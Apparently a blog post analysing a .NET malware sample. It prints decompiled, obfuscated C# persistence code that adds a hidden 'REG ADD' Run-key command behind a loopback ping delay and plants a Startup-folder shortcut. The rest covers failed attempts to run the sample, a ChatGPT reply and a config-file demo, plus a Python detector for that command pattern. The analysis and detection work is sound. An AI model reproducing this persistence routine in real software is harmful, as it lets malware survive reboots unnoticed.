				if (((registryKey == null) ? (Convert.ToInt32(1742.71775024737 + Math.Tan(878.0)) / <Module>.ValidateKeyView(int.Parse("1")) + Convert.ToInt32(71261.0 - Math.Round(23753.5)) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32(49258.60850913985 + Math.Log10(24631.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length) : ((registryKey.GetValue(string_1) == null) ? 1 : 0)) != 0)
				{
					flag = (Convert.ToInt32((double)-2769f) + Convert.ToInt32(101784.0 - Math.Ceiling(33928.0)) / <Module>.ValidateKeyView(int.Parse("11")) - Convert.ToInt32(32543.0 + Math.Ceiling(32543.5)) / <Module>.ValidateKeyView(int.Parse("5")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0);
				}
				else if ((registryKey.GetValue(string_1).ToString().Contains(string_2) ? 1 : 0) == (int.Parse("-794158252") ^ int.Parse("794070017")) + Convert.ToInt32(62933.30313586881 - Math.Sin(31466.5)) / <Module>.ValidateKeyView(int.Parse("5")) + Convert.ToInt32((double)29398f) / <Module>.ValidateKeyView(int.Parse("5")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length)
				{
					flag = ((int.Parse("-307881638") ^ int.Parse("307845457")) + Convert.ToInt32(7068.198817555759 - Math.Sqrt(3504.5)) / <Module>.ValidateKeyView(int.Parse("4")) + (int.Parse("63199555") ^ int.Parse("63241687")) / <Module>.ValidateKeyView(int.Parse("10")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length != 0);
				}
				if ((flag ? 1 : 0) == Convert.ToInt32(31794.857105094576 - Math.Cos(15897.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32((double)23443f) / <Module>.ValidateKeyView(int.Parse("14")) - Convert.ToInt32(27618.0 + Math.Ceiling(27618.5)) / <Module>.ValidateKeyView(int.Parse("2")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length)
				{
					if (bool_0)
					{
						string_2 = Class12_Startup.ReservedMask(string_0, string_1, string_2);
					}
					Class12_Startup.DontWriteAnything(string_0, string_1, string_2);
				}
			}
			return flag;
		}

		// Token: 0x06000116 RID: 278 RVA: 0x0001EBC8 File Offset: 0x0001CDC8
		private static string ReservedMask(string string_0, string string_1, string string_2)
		{
			using (Registry.CurrentUser.OpenSubKey(string_0, Convert.ToInt32(17167.5 - Math.Abs(5722.5)) / <Module>.ValidateKeyView(int.Parse("6")) + Convert.ToInt32(25950.840024526984 + Math.Sqrt(13032.5)) / <Module>.ValidateKeyView(int.Parse("1")) - Convert.ToInt32(37509.68172000347 - Math.Tan(18755.0)) / <Module>.ValidateKeyView(int.Parse("4")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0))
			{
				string_2 = Registry.LocalMachine.OpenSubKey(string_0, Convert.ToInt32(88436.64557945158 - Math.Log10(44216.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(5106.0 - Math.Truncate(1702.0)) / <Module>.ValidateKeyView(int.Parse("9")) - Convert.ToInt32(91836.52286918914 - Math.Tan(45918.0)) / <Module>.ValidateKeyView(int.Parse("7")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length != 0).GetValue(string_1).ToString() + "," + string_2 + ",";
			}
			return string_2;
		}

		// Token: 0x06000117 RID: 279 RVA: 0x0001ED58 File Offset: 0x0001CF58
		internal static bool Get_AutoFlush(string string_0)
		{
			string text = Environment.GetFolderPath((Environment.SpecialFolder)(((int.Parse("-1662360029") ^ int.Parse("1662352573")) + Convert.ToInt32(72774.0 - Math.Truncate(24258.0)) / <Module>.ValidateKeyView(int.Parse("3")) + (int.Parse("435685617") ^ int.Parse("435695380")) / <Module>.ValidateKeyView(int.Parse("13"))) * (Convert.ToInt32((double)-111662f) + Convert.ToInt32(54118.22270696087 + Math.Tan(27135.5)) / <Module>.ValidateKeyView(int.Parse("8")) + Convert.ToInt32((double)57392f) / <Module>.ValidateKeyView(int.Parse("11"))))) + "\\" + Path.ChangeExtension(Path.GetFileName(string_0), ".lnk");
			bool result;
			if ((File.Exists(text) ? 1 : 0) == Convert.ToInt32((double)-120906f) + Convert.ToInt32(81849.85600839289 - Math.Sin(40924.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(19529.0 + Math.Round(19528.5)) / <Module>.ValidateKeyView(int.Parse("5")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length)
			{
				result = Class12_Startup.EndAddr(text, string_0);
			}
			else
			{
				result = ((int.Parse("-1543707215") ^ int.Parse("1543714655")) + Convert.ToInt32(130967.0 - Math.Round(43655.5)) / <Module>.ValidateKeyView(int.Parse("13")) - Convert.ToInt32(75771.96340220865 - Math.Cos(37886.0)) / <Module>.ValidateKeyView(int.Parse("10")) != 0);
			}
			return result;
		}

		// Token: 0x06000118 RID: 280 RVA: 0x0001EF40 File Offset: 0x0001D140
		private static bool EndAddr(string string_0, string string_1)
		{
			try
			{
				object objectValue = RuntimeHelpers.GetObjectValue(Activator.CreateInstance(Type.GetTypeFromCLSID(new Guid("72C24DD5-D70A-438B-8A42-98424B88AFB8"))));
				try
				{
					object instance = objectValue;
					Type type = null;
					string memberName = "CreateShortcut";
					object[] array = new object[(int.Parse("-1895988106") ^ int.Parse("1895964075")) + Convert.ToInt32(46540.0 + Math.Truncate(46539.5)) / <Module>.ValidateKeyView(int.Parse("1")) - Convert.ToInt32(100397.0 - Math.Ceiling(33465.5)) / <Module>.ValidateKeyView(int.Parse("2"))];
					array[Convert.ToInt32((double)-35910f) + Convert.ToInt32(8856.587538226117 + Math.Cos(4428.5)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(27055.55674404852 + Math.Tan(13526.5)) / <Module>.ValidateKeyView(int.Parse("1")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length] = string_0;
					object[] array2 = array;
					string[] argumentNames = null;
					Type[] typeArguments = null;
					bool[] array3 = new bool[(int.Parse("-242492809") ^ int.Parse("242534661")) + Convert.ToInt32(56867.0 + Math.Tanh(28434.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(1845.5 + Math.Abs(1845.5)) / <Module>.ValidateKeyView(int.Parse("10"))];
					array3[(int.Parse("-487234369") ^ int.Parse("487301002")) + Convert.ToInt32(43103.984831455695 - Math.Cos(21551.5)) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32((double)23660f) / <Module>.ValidateKeyView(int.Parse("14")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length] = (Convert.ToInt32(11909.0 + Math.Round(11909.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32((double)10079f) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32(33895.0 + Math.Tanh(16948.0)) / <Module>.ValidateKeyView(int.Parse("1")) != 0);
					bool[] array4 = array3;
					object obj = NewLateBinding.LateGet(instance, type, memberName, array, argumentNames, typeArguments, array3);
					if (array4[Convert.ToInt32(20887.0 + Math.Abs(20887.0)) / <Module>.ValidateKeyView(int.Parse("8")) + (int.Parse("1450761171") ^ int.Parse("1450727027")) / <Module>.ValidateKeyView(int.Parse("2")) - Convert.ToInt32(78227.52215065657 - Math.Sqrt(39015.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length])
					{
						string_0 = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array2[Convert.ToInt32((double)-9165f) + Convert.ToInt32((double)20283f) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(11117.951818134667 - Math.Cos(5559.0)) / <Module>.ValidateKeyView(int.Parse("11")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length]), typeof(string));
					}
					object objectValue2 = RuntimeHelpers.GetObjectValue(obj);
					try
					{
						object instance2 = objectValue2;
						Type type2 = null;
						string memberName2 = "TargetPath";
						object[] array5 = new object[Convert.ToInt32((double)-343f) + Convert.ToInt32(41512.54976434498 + Math.Tan(20756.0)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32(61752.0 - Math.Round(20584.0)) / <Module>.ValidateKeyView(int.Parse("8"))];
						array5[Convert.ToInt32((double)67238f) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32(1366.0 + Math.Truncate(1365.5)) / <Module>.ValidateKeyView(int.Parse("14")) - Convert.ToInt32((double)69969f) / <Module>.ValidateKeyView(int.Parse("3")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length] = string_1;
						NewLateBinding.LateSet(instance2, type2, memberName2, array5, null, null);
						object instance3 = objectValue2;
						Type type3 = null;
						string memberName3 = "WorkingDirectory";
						object[] array6 = new object[Convert.ToInt32(14924.872562366774 - Math.Tan(7462.0)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32(27867.859461327458 + Math.Cos(13933.5)) / <Module>.ValidateKeyView(int.Parse("2")) - Convert.ToInt32(21395.0 + Math.Truncate(21395.0)) / <Module>.ValidateKeyView(int.Parse("10"))];
						array6[Convert.ToInt32((double)-112984f) + Convert.ToInt32(32695.0 + Math.Ceiling(32695.0)) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32((double)47594f) / <Module>.ValidateKeyView(int.Parse("14")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length] = string_1;
						NewLateBinding.LateSet(instance3, type3, memberName3, array6, null, null);
						NewLateBinding.LateCall(objectValue2, null, "Save", new object[Convert.ToInt32((double)-133151f) + Convert.ToInt32(29711.0 + Math.Round(29710.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32((double)73730f) / <Module>.ValidateKeyView(int.Parse("1")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length], null, null, null, (int.Parse("-1531599926") ^ int.Parse("1531690413")) + Convert.ToInt32(80861.0 + Math.Tanh(40431.0)) / <Module>.ValidateKeyView(int.Parse("14")) + Convert.ToInt32(21214.0 + Math.Abs(21214.0)) / <Module>.ValidateKeyView(int.Parse("1")) != 0);
					}
					finally
					{
						Marshal.FinalReleaseComObject(RuntimeHelpers.GetObjectValue(objectValue2));
					}
				}
				finally
				{
					Marshal.FinalReleaseComObject(RuntimeHelpers.GetObjectValue(objectValue));
				}
				return Convert.ToInt32(13965.0 - Math.Truncate(4655.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(82742.80586871838 + Math.Cos(41371.0)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32((double)92051f) / <Module>.ValidateKeyView(int.Parse("13")) != 0;
			}
			catch (Exception ex)
			{
			}
			return Convert.ToInt32(58988.53022951354 + Math.Log10(29496.5)) / <Module>.ValidateKeyView(int.Parse("1")) + Convert.ToInt32(14443.0 + Math.Truncate(14442.5)) / <Module>.ValidateKeyView(int.Parse("14")) - Convert.ToInt32(87867.30944241263 + Math.Log(43939.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0;
		}

		// Token: 0x06000119 RID: 281 RVA: 0x0001F744 File Offset: 0x0001D944
		private static void DontWriteAnything(string string_0, string string_1, string string_2)
		{
			int num = Convert.ToInt32((double)9766f) / <Module>.ValidateKeyView(int.Parse("3")) + Convert.ToInt32(24671.140469336275 + Math.Sin(12336.0)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(17219.0 + Math.Round(17219.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length;
			string[] array = new string[(Convert.ToInt32((double)-107374f) + Convert.ToInt32((double)64747f) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32((double)42636f) / <Module>.ValidateKeyView(int.Parse("5"))) * ((int.Parse("-675922721") ^ int.Parse("675917610")) + Convert.ToInt32(92703.90390270783 - Math.Cos(46351.5)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(65038.487829431506 + Math.Log10(32521.5)) / <Module>.ValidateKeyView(int.Parse("2")))];
			array[Convert.ToInt32((double)-175617f) + Convert.ToInt32(79404.99246461812 + Math.Sin(39702.0)) / <Module>.ValidateKeyView(int.Parse("10")) + (int.Parse("521541980") ^ int.Parse("521629321")) / <Module>.ValidateKeyView(int.Parse("14")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length] = "REG ADD ";
			array[Convert.ToInt32((double)-86545f) + Convert.ToInt32(145230.0 - Math.Abs(48410.0)) / <Module>.ValidateKeyView(int.Parse("4")) - Convert.ToInt32(10274.879487822023 + Math.Cos(5137.0)) / <Module>.ValidateKeyView(int.Parse("2"))] = "\"HKCU\\" + string_0 + "\"";
			array[(Convert.ToInt32(40118.09141265462 - Math.Cos(20059.5)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32((double)42431f) / <Module>.ValidateKeyView(int.Parse("8")) - (int.Parse("2012817835") ^ int.Parse("2012769247")) / <Module>.ValidateKeyView(int.Parse("4"))) * (Convert.ToInt32(6129.0 + Math.Abs(6129.0)) / <Module>.ValidateKeyView(int.Parse("7")) + Convert.ToInt32(69824.98084182877 + Math.Sin(34912.5)) / <Module>.ValidateKeyView(int.Parse("6")) - Convert.ToInt32(123123.0 - Math.Round(41041.0)) / <Module>.ValidateKeyView(int.Parse("10")))] = " /f /v ";
			array[((int.Parse("-157731048") ^ int.Parse("157767075")) + Convert.ToInt32(142963.0 - Math.Truncate(47654.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(10499.56512584517 - Math.Log(5245.5)) / <Module>.ValidateKeyView(int.Parse("12"))) * (Convert.ToInt32((double)-63567f) + Convert.ToInt32(114301.5 - Math.Abs(38100.5)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32(12632.053301785229 + Math.Sin(6316.5)) / <Module>.ValidateKeyView(int.Parse("13")))] = "\"" + string_1 + "\"";
			array[(Convert.ToInt32((double)-99905f) + Convert.ToInt32(41727.945540788765 - Math.Log(20859.0)) / <Module>.ValidateKeyView(int.Parse("1")) + Convert.ToInt32(87287.0 - Math.Round(29095.5)) / <Module>.ValidateKeyView(int.Parse("6"))) * (Convert.ToInt32((double)-62966f) + Convert.ToInt32(21145.0 + Math.Ceiling(21145.0)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(20676.47757917575 - Math.Tan(10338.5)) / <Module>.ValidateKeyView(int.Parse("1")))] = " /t REG_SZ /d ";
			string[] array2 = array;
			array2[(Convert.ToInt32((double)-73656f) + Convert.ToInt32(24033.0 - Math.Truncate(8011.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(57634.54031355819 + Math.Log10(28819.5)) / <Module>.ValidateKeyView(int.Parse("10"))) * (Convert.ToInt32((double)-63764f) + Convert.ToInt32(29148.412662583894 + Math.Log(14579.0)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(34611.23813395729 - Math.Log10(17303.5)) / <Module>.ValidateKeyView(int.Parse("14")))] = null;
			array2[(Convert.ToInt32(10491.504885601247 - Math.Tan(5246.0)) / <Module>.ValidateKeyView(int.Parse("12")) + Convert.ToInt32(28645.0 + Math.Floor(28645.0)) / <Module>.ValidateKeyView(int.Parse("9")) - Convert.ToInt32(101662.5 - Math.Abs(33887.5)) / <Module>.ValidateKeyView(int.Parse("3"))) * (Convert.ToInt32(14720.742966535727 - Math.Tan(7360.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(17.0 + Math.Round(17.5)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32((double)14755f) / <Module>.ValidateKeyView(int.Parse("5")))] = string_2;
			array2[((int.Parse("-1905992075") ^ int.Parse("1905959876")) + Convert.ToInt32(18126.994805559836 + Math.Tan(9063.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(80771.39374765242 + Math.Log10(40388.0)) / <Module>.ValidateKeyView(int.Parse("13"))) * (Convert.ToInt32(79501.54361120917 + Math.Tan(39751.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(6514.910057508764 + Math.Log(3261.5)) / <Module>.ValidateKeyView(int.Parse("5")) - Convert.ToInt32(86013.33076557449 + Math.Log(43012.0)) / <Module>.ValidateKeyView(int.Parse("3")))] = "\"";
			array2[((int.Parse("-1145493769") ^ int.Parse("1145451793")) + Convert.ToInt32((double)56347f) / <Module>.ValidateKeyView(int.Parse("5")) + Convert.ToInt32(4101.81919317079 - Math.Sin(2050.5)) / <Module>.ValidateKeyView(int.Parse("7"))) * (Convert.ToInt32((double)-141150f) + Convert.ToInt32(64057.5 - Math.Abs(21352.5)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(98446.86466984783 - Math.Cos(49223.0)) / <Module>.ValidateKeyView(int.Parse("11")))] = "\"";
			string str = (checked(Class6_GetOptions.InternalBinarySearch.ExecutionDelay + unchecked(new Random().Next(((int.Parse("128585495") ^ int.Parse("128590991")) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32(28927.0 - Math.Floor(9642.5)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(30441.0 - Math.Tanh(15220.0)) / <Module>.ValidateKeyView(int.Parse("6"))) * (Convert.ToInt32((double)-112778f) + Convert.ToInt32(20761.0 + Math.Abs(20761.0)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32((double)71257f) / <Module>.ValidateKeyView(int.Parse("1"))), (Convert.ToInt32((double)-115314f) + Convert.ToInt32(144558.0 - Math.Floor(48186.0)) / <Module>.ValidateKeyView(int.Parse("7")) + Convert.ToInt32(18951.423662756893 + Math.Cos(9476.0)) / <Module>.ValidateKeyView(int.Parse("8"))) * (Convert.ToInt32((double)-58079f) + Convert.ToInt32(145313.0 - Math.Ceiling(48437.5)) / <Module>.ValidateKeyView(int.Parse("9")) - Convert.ToInt32(38804.87289947077 - Math.Log(19397.5)) / <Module>.ValidateKeyView(int.Parse("1"))))))).ToString() + " ";
			Class12_Startup.LOCALE_SISO639LANGNAME2("cmd", "/c ping 127.0.0.1 -n " + str + "> nul &&  " + string.Concat(array), Convert.ToInt32((double)-10971f) + Convert.ToInt32((double)71543f) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32(60572.0 - Math.Tanh(30285.5)) / <Module>.ValidateKeyView(int.Parse("3")) != 0);
		}

		// Token: 0x0600011A RID: 282 RVA: 0x00020220 File Offset: 0x0001E420
		internal static void LOCALE_SISO639LANGNAME2(string string_0, string string_1, bool bool_0)
		{
			int num = (int.Parse("-1913524470") ^ int.Parse("1913642619")) + Convert.ToInt32(68468.15533314795 - Math.Cos(34234.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(74919.0 - Math.Ceiling(24973.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length;
			Class12_Startup.DateTimeOffset(string_0, string_1);
		}

		// Token: 0x0600011B RID: 283 RVA: 0x000202B8 File Offset: 0x0001E4B8
		private static void DateTimeOffset(string string_0, string string_1)
		{
			Process.Start(new ProcessStartInfo
			{
				FileName = string_0,
				Arguments = string_1,
				WindowStyle = (ProcessWindowStyle)(Convert.ToInt32((double)-74359f) + Convert.ToInt32((double)78320f) / <Module>.ValidateKeyView(int.Parse("6")) - Convert.ToInt32(5940.0 - Math.Abs(1980.0)) / <Module>.ValidateKeyView(int.Parse("7"))),
				CreateNoWindow = (Convert.ToInt32((double)-69394f) + Convert.ToInt32(31566.0 + Math.Truncate(31565.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(3132.0 + Math.Floor(3132.0)) / <Module>.ValidateKeyView(int.Parse("9")) != 0),
				UseShellExecute = (Convert.ToInt32((double)-124642f) + Convert.ToInt32(68329.0 + Math.Tanh(34165.0)) / <Module>.ValidateKeyView(int.Parse("6")) + Convert.ToInt32(84468.0 - Math.Truncate(28156.0)) / <Module>.ValidateKeyView(int.Parse("3")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length != 0),
				RedirectStandardError = (Convert.ToInt32((double)-46178f) + Convert.ToInt32(67591.98330745602 + Math.Sin(33795.5)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(21308.530197642016 + Math.Sqrt(10706.0)) / <Module>.ValidateKeyView(int.Parse("3")) != 0)
			});
		}

		// Token: 0x0600011C RID: 284 RVA: 0x00011E59 File Offset: 0x00010059
		public static string smethod_0()
		{
			return ")mmk!kiic%";
		}

		// Token: 0x0600011D RID: 285 RVA: 0x00011E60 File Offset: 0x00010060
		public static int smethod_1()
		{
			return 77109389;
		}

		// Token: 0x0600011E RID: 286 RVA: 0x00011E67 File Offset: 0x00010067
		public static string smethod_2()
		{
			return "!aon!mkk@n";
		}

		// Token: 0x0600011F RID: 287 RVA: 0x00011D63 File Offset: 0x0000FF63
		public static int smethod_3()
		{
			return 19053177;
		}

		// Token: 0x06000120 RID: 288 RVA: 0x00011E6E File Offset: 0x0001006E
		public static string smethod_4()
		{
			return "c]$)%&d%&k";
		}

		// Token: 0x06000121 RID: 289 RVA: 0x00011E75 File Offset: 0x00010075
		public static int smethod_5()
		{
			return 31180742;
		}

		// Token: 0x06000122 RID: 290 RVA: 0x00011E7C File Offset: 0x0001007C
		public static string smethod_6()
		{
			return "%q)e]*!@ml";
		}

		// Token: 0x06000123 RID: 291 RVA: 0x00011E83 File Offset: 0x00010083
		public static int smethod_7()
		{
			return 76529586;
		}

		// Token: 0x06000124 RID: 292 RVA: 0x00011E8A File Offset: 0x0001008A
		public static string smethod_8()
		{
			return "^/bu$$g**n";
		}

		// Token: 0x06000125 RID: 293 RVA: 0x00011E91 File Offset: 0x00010091
		public static int smethod_9()
		{
			return 61914793;
		}

		// Token: 0x06000126 RID: 294 RVA: 0x00011E98 File Offset: 0x00010098
		public static string smethod_10()
		{
			return "%!%k^os@f!";
		}

		// Token: 0x06000127 RID: 295 RVA: 0x00011913 File Offset: 0x0000FB13
		public static int smethod_11()
		{
			return 38322046;
		}

		// Token: 0x06000128 RID: 296 RVA: 0x00011E9F File Offset: 0x0001009F
		public static string smethod_12()
		{
			return "ak)uag%^e@";
		}

		// Token: 0x06000129 RID: 297 RVA: 0x00011E60 File Offset: 0x00010060
		public static int smethod_13()
		{
			return 77109389;
		}

		// Token: 0x0600012A RID: 298 RVA: 0x00011EA6 File Offset: 0x000100A6
		public static string smethod_14()
		{
			return "/&dsv([]@#";
		}

		// Token: 0x0600012B RID: 299 RVA: 0x00011913 File Offset: 0x0000FB13
		public static int smethod_15()
		{
			return 38322046;
		}
	}
}

Well, it looks like deobfuscating it was not much use, so the only option is to actually run it and see.
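The decompiled `Class12_Startup` code above builds `cmd /c ping 127.0.0.1 -n <count> > nul && <command>`, so one place to look for this sample's behaviour is the process-creation records of a monitor log. The Python below is an added example, not code from the original post or from the sample. It assumes the comma-and-tab record layout of the monitor output shown earlier on the page; the records, PIDs, times and `PLACEHOLDER_COMMAND` are constructed.

```python
import re

# Loopback ping with output sent to nul, then a chained command: the delay
# idiom that the decompiled Class12_Startup code above assembles.
DELAY_RE = re.compile(
    r"ping(?:\.exe)?\s+(?:-n\s+(?P<n1>\d+)\s+)?(?:127\.0\.0\.1|localhost)"
    r"(?:\s+-n\s+(?P<n2>\d+))?\s*>\s*nul\s*&{1,2}\s*(?P<next>\S.*)",
    re.IGNORECASE,
)
CMDLINE_RE = re.compile(r"cmdline:'(?P<cmd>.*)'")  # greedy: keeps inner quotes

def parse_exec_events(log_text):
    """Yield (time, process, pid, cmdline) for every EXEC_create record.
    Assumed layout: time, process, pid:tid, pid, event, path, details, result."""
    for line in log_text.splitlines():
        fields = re.split(r",\s+", line, maxsplit=6)
        if len(fields) < 7 or fields[4] != "EXEC_create":
            continue
        m = CMDLINE_RE.search(fields[6])
        if m:
            yield fields[0], fields[1], int(fields[3]), m.group("cmd")

def find_ping_delays(log_text):
    """Return one finding per process created with a ping-delay chain."""
    findings = []
    for ts, proc, pid, cmd in parse_exec_events(log_text):
        m = DELAY_RE.search(cmd)
        if m:
            count = int(m.group("n1") or m.group("n2") or 4)  # ping sends 4 by default
            findings.append({"time": ts, "process": proc, "pid": pid,
                             "delay_s": max(count - 1, 0),  # about 1 s between echoes
                             "chained": m.group("next").strip()})
    return findings

def _rec(*fields):  # join fields the way the monitor output does (assumed)
    return ",\t".join(fields) + ",\t"

# Constructed records: names, PIDs, times and PLACEHOLDER_COMMAND are made up.
SAMPLE_LOG = "\n".join([
    _rec("09:30:21:400", "sample.exe", "1908:4832", "1908", "FILE_readdir",
         r"C:\Windows\Microsoft.NET\Framework", "filter:'*' ", "0x00000000"),
    _rec("09:30:21:440", "cmd.exe", "5120:0", "5120", "EXEC_create",
         r"C:\Windows\SysWOW64\cmd.exe",
         "parent_pid:1908 cmdline:'cmd /c ping 127.0.0.1 -n 37 > nul &&  PLACEHOLDER_COMMAND' ",
         "0x00000000"),
    _rec("09:30:21:502", "PING.EXE", "5188:0", "5188", "EXEC_create",
         r"C:\Windows\SysWOW64\PING.EXE",
         "parent_pid:5120 cmdline:'ping 127.0.0.1 -n 37' ", "0x00000000"),
])
print(find_ping_delays(SAMPLE_LOG))
```

Only the `cmd.exe` record is reported: the child `PING.EXE` record carries neither the redirect nor the chained command, because `cmd` handles both.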

[Image 04]

Running it:

[Image 05]

It is run via reflection:

[Image 06]

This is because the functions in the DLL are run through invoke. The article "Calling a Win32 DLL from C# through P/Invoke" covers the basics and usage of P/Invoke in detail.

[Image 07]

[Image 08]

[Image 09]

Tracing shows that the program dies at: new DataGridView

[Image 10]

Stepping in further, it dies at:

[Image 11]

[Image 12]

[Image 13]

[Image 14]

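So I suspect it is an environment problem! I am on a Chinese-language environment!

This line of .NET code fails at runtime: this.horizScrollBar.AccessibleName = SR.GetString("DataGridView_AccHorizontalScrollBarAccName"); what could the cause be? I am on a zh-CN environment.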

 

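ChatGPT's answer

Based on the code you provided, the error appears to be related to retrieving a resource string. The SR.GetString("DataGridView_AccHorizontalScrollBarAccName") call in the code fetches the resource string named "DataGridView_AccHorizontalScrollBarAccName". You mention that you are running in a zh-CN environment, which may cause the resource string lookup to fail and so raise the error.

Please check the following points to rule out the problem:

  1. The resource string exists and is correct: make sure a resource string named "DataGridView_AccHorizontalScrollBarAccName" exists in your code, and that its key has no spelling or letter-case problems.
  2. Localized resources: since you are running in a zh-CN environment, you need to make sure localized resources for the Chinese environment exist. Even in a zh-CN environment, your application should provide the corresponding resource files so that the resource strings for the Chinese environment can be loaded when needed.
  3. Resource file location: make sure the resource files are in the correct location so that the application can find and load the resource strings. Resource files are usually stored in different folders according to language and region.
  4. How the resource string is retrieved: if the SR.GetString method is used to get the resource string, make sure its implementation correctly fetches the string from the resource file and returns it.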

 

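OK, I tried an English environment and it still fails, now throwing an error at New Form. Ugh. Stepping in:

[Image 15]

In the end it can be confirmed that the program cannot run because its configuration file is missing.

About configuration files for .NET programs!

For example, let's write a simple program: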

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;


namespace TestWindowsFormsApp
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            LoadSetting();
        }

        private void LoadSetting()
        {
            string enableFeatureValue = System.Configuration.ConfigurationManager.AppSettings.Get("EnableFeature");
            bool enableFeature = Convert.ToBoolean(enableFeatureValue);
            if (enableFeature)
            {
                MessageBox.Show("Feature is enabled!");
            }
            else
            {
                MessageBox.Show("Feature is disabled.");
            }
        }
    }
}

  

The built program:

[Image 16]

Along with it, the contents of that file:

[Image 17]

Quite a lot of content was generated automatically!

OK, now that the cause is known, it should be clear how to change things so the program runs.

 



From: https://blog.51cto.com/u_11908275/7408058
